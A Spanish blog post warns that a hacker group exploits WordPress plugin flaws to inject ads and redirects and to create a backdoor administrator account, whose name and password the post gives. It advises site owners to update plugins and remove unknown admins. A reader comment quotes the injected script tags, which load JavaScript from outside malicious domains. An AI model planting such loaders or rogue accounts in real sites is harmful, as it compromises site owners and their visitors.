¡Alerta de seguridad!: Ataque organizado a sitios WordPress a través de plugins

Un grupo de hackers está explotando vulnerabilidades en más de diez plugins WordPress, creando cuentas de administrador falsas en sitios WordPress por toda la red.

Los ataques son un escalado de una campaña de hackeo que empezó hace un mes.

En los anteriores ataques los hackers atacaron vulnerabilidades en los mismos plugins para poder inyectar código malintencionado en los sitios hackeados.

El objetivo de este código era mostrar anuncios emergentes o redirigir a los visitantes a otras webs.

Sin embargo, hace dos semanas, el mismo grupo de hackers que estaba detrás de estos ataques, cambió de táctica y modificó el código inyectado en los sitios comprometidos.

En vez de simplemente insertar anuncios o redirecciones, el código también ejecutaba una función con la que probar si el visitante del sitio podía crear cuentas de usuario en el sitio, vamos, si el usuario tenía perfil de administrador de WordPress.

Simplemente, el código esperaba a que el administrador accediese a sus webs, y cuando lo hacía, el código creaba una nueva cuenta de administrador llamada wpservices, usando la dirección de email [email protected], y la contraseña w0rdpr3ss.

Al crear estas cuentas, el grupo de hackers tras esta campaña cambió de táctica para, de este modo, explotar los sitios para obtener ingresos económicos, y de paso añadir puertas traseras para usarlas en el futuro con otros fines.

Estos ataques aprovechan vulnerabilidades de los siguientes plugins:

En la lista de plugins tienes el enlace a su respectiva vulnerabilidad, para que puedas revisar a qué versión tienes que actualizar para estar a salvo, si usas alguno de ellos.

Una vez actualices los plugins, revisa en la lista de usuarios si existe algún administrador raro, como el que te he puesto arriba, o cualquier otro que no debería estar ahí. Si encuentras alguno bórralo sin piedad.

Y si tienes más problemas, como código inyectado o comportamientos extraños, contrata un profesional que limpie tu instalación y no pongas ya más excusas para tener un servicio de mantenimiento WordPress profesional que te evite estos problemas en el futuro.

VALORA Y COMPARTE ESTE ARTÍCULO PARA MEJORAR LA CALIDAD DEL BLOG…
(17 votos, promedio: 4.5)

¿Te gustó este artículo? ¡Ni te imaginas lo que te estás perdiendo en YouTube!

6 comentarios en “¡Alerta de seguridad!: Ataque organizado a sitios WordPress a través de plugins”

  1. Cinthya Davis Gutierrez

    Como se puede solucionar si se utiliza el plugin nd-booking, con cual otro podría solucionarlo. Por el momento nadie en la página puede crear un usuario

  2. Muchas gracias por la información maestro 🙂

    Aunque la lista de plugins puede ser bastante más larga. Ya me he topado con un caso y he tenido que limpiar «a mano» la base de datos.

    El malware inyecta al final de cada publicación un código del tipo:
    < script src='https :// challengeforme .com/pystats .js?l=l&' async=true type=text/javascript language=javascript >< /scrip t>
    < src='https :// eaglelocation .xyz/stats .js?l=l&' type='text/javascript' >< /script >
    Y crea uno o varios usuarios administrador.

    Este código no sólo puede estar en entradas y páginas, sino también en descripciones de las imágenes y lo he encontrado hasta en la parte de CSS del personalizador de WordPress.

    Nos vemos el jueves en Vigo. Un abrazo.

  3. Pues de Yuzo Related Posts Ya Es la segunda liada en poco tiempo. Ya tuvieron una vulnerabilidad hace nada que hasta lo quitaron del repositorio hasta solucionarlo. No da confianza.

    Muchas gracias como siempre por todo lo que aportas Fernando.

    1. Hola, fue solo 1 vez y por una brecha pequeña que hubo y aprovecharon. Actualmente paso las pruebas de los revisores de WordPress y esta nuevamente publicada.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

 

Ir arriba Ir al contenido